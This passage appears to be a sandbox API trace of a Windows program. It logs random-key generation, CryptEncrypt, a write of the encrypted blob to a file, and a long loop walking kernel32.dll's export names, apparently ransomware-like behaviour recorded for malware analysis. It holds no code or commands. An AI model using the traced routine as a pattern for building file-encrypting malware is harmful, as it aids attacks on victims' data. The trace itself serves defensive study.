dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.127] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.127] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.127] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.127] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.128] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.129] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.129] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.132] CloseHandle (hObject=0x414) returned 1 [0084.132] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.132] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.133] CloseHandle (hObject=0x0) returned 0 [0084.133] CloseHandle (hObject=0x410) returned 1 [0084.133] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.133] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.133] GetTickCount () returned 0x114d7f8 [0084.133] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.134] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.134] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.134] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.134] lstrlenA (lpString="kernel32.dll") returned 12 [0084.134] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.134] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.134] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.134] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.135] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.135] lstrlenA (lpString="ADDATOMA") returned 8 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.135] lstrlenA (lpString="ADDATOMW") returned 8 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.135] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.135] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.135] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.135] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.135] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.135] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.135] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.135] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.135] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.135] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.135] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.135] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.135] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.135] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.135] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.135] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.135] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.136] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.136] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.136] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.136] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.136] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.136] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.136] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.136] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.136] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.136] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.136] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.136] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.136] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.136] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.136] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.136] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.136] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.136] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.136] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.137] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.137] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.137] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.137] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.137] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.137] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.137] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.137] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.137] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.137] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.137] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.137] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.137] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.137] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.137] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.137] lstrlenA (lpString="BEEP") returned 4 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.137] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.137] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.137] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.137] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.138] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.138] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.138] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.138] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.138] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.138] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.138] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.138] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.138] lstrlenA (lpString="CANCELIO") returned 8 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.138] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.138] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.138] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.138] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.138] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.138] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.138] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.138] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.138] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.138] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.138] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.139] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.139] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.139] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.139] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.139] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.139] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.139] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.139] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.139] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.139] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.139] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.139] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.139] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.139] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.139] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.139] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.139] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.139] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.139] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.139] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.140] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.140] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.140] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.140] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.140] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.140] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.140] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.140] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.140] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.140] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.140] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.140] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.140] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.140] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.140] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.140] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.140] lstrlenA 